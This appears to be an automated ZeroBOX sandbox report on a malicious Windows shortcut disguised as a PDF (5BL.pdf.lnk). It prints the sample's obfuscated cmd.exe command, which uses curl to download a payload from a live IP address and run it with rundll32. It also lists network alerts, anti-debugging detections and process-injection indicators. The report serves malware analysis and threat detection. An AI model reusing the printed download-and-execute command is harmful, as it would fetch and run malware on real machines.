Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 1, 2023, 4:45 p.m.	Oct. 1, 2023, 4:47 p.m.

Size	2.2KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Thu Sep 28 04:26:44 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`f99a611041175e3d94c2d68a8aa4b90b`
SHA256	`a30b29ea03bd34814b081df4628b81f801979726750bfa495ebb8bb5fc9ea737`
CRC32	`99CB4D5A`
ssdeep	`24:8aPiWJCnIcV0RA8JK+/oe+GD85R6nEq7iR6hMbuMZi85GVH:8aPYyiSGe+G45R6nEq7iR6hZz`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "NqNMoicO" C:\Users\test22\AppData\Local\Temp\5BL.pdf.lnk
3016
- cmd.exe "C:\Windows\System32\cmd.exe" /c Wxn7 || ECHO Wxn7 & pI"Ng" Wxn7 || C"U"rL ht"t"p":"//155."1"38."2"23.1"15"/eM19/X"9" -o C:\Users\test22\AppData\Local\Temp\Wxn7.log & pI"Ng" -n 4 Wxn7 || r"U"N"DLL"3"2" C:\Users\test22\AppData\Local\Temp\Wxn7.log scab /k pechene634 & e"XiT" 'GwqAbGPWBJMopBk
  2212
  - PING.EXE pI"Ng" Wxn7
    2272
  - curl.exe C"U"rL ht"t"p":"//155."1"38."2"23.1"15"/eM19/X"9" -o C:\Users\test22\AppData\Local\Temp\Wxn7.log
    2400
  - PING.EXE pI"Ng" -n 4 Wxn7
    2472
  - rundll32.exe r"U"N"DLL"3"2" C:\Users\test22\AppData\Local\Temp\Wxn7.log scab /k pechene634
    1592

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
155.138.223.115	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49166 -> 155.138.223.115:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.102:49166 -> 155.138.223.115:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 1, 2023, 4:45 p.m.	buffer: 'Wxn7' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 1, 2023, 4:45 p.m.	buffer: Wxn7 console_handle: 0x00000007	1	1
WriteConsoleW Oct. 1, 2023, 4:45 p.m.	buffer: 'e"XiT"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Oct. 1, 2023, 4:45 p.m.	buffer: Ping request could not find host Wxn7. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 1, 2023, 4:45 p.m.	buffer: Ping request could not find host Wxn7. Please check the name and try again. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 1, 2023, 4:45 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 1, 2023, 4:45 p.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25 rundll32+0x135c @ 0x24135c rundll32+0x1901 @ 0x241901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75d43ef4 registers.esp: 850328 registers.edi: 0 registers.eax: 10547808 registers.ebp: 850356 registers.edx: 1 registers.ebx: 0 registers.esi: 5101608 registers.ecx: 1941190356	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 1, 2023, 4:45 p.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25
rundll32+0x135c @ 0x24135c
rundll32+0x1901 @ 0x241901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75d43ef4
registers.esp: 850328
registers.edi: 0
registers.eax: 10547808
registers.ebp: 850356
registers.edx: 1
registers.ebx: 0
registers.esi: 5101608
registers.ecx: 1941190356

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://155.138.223.115/eM19/X9

Performs some HTTP requests (1 event)

request

GET http://155.138.223.115/eM19/X9

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 1, 2023, 4:45 p.m.	process_identifier: 1592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f11000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Oct. 1, 2023, 4:45 p.m.	process_identifier: 1592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f13000 process_handle: 0xffffffff	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\5BL.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c Wxn7 || ECHO Wxn7 & pI"Ng" Wxn7 || C"U"rL ht"t"p":"//155."1"38."2"23.1"15"/eM19/X"9" -o C:\Users\test22\AppData\Local\Temp\Wxn7.log & pI"Ng" -n 4 Wxn7 || r"U"N"DLL"3"2" C:\Users\test22\AppData\Local\Temp\Wxn7.log scab /k pechene634 & e"XiT" 'GwqAbGPWBJMopBk

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

155.138.223.115

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3016 resumed a thread in remote process 2212
NtResumeThread Oct. 1, 2023, 4:45 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2212	1	0	0

5BL.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All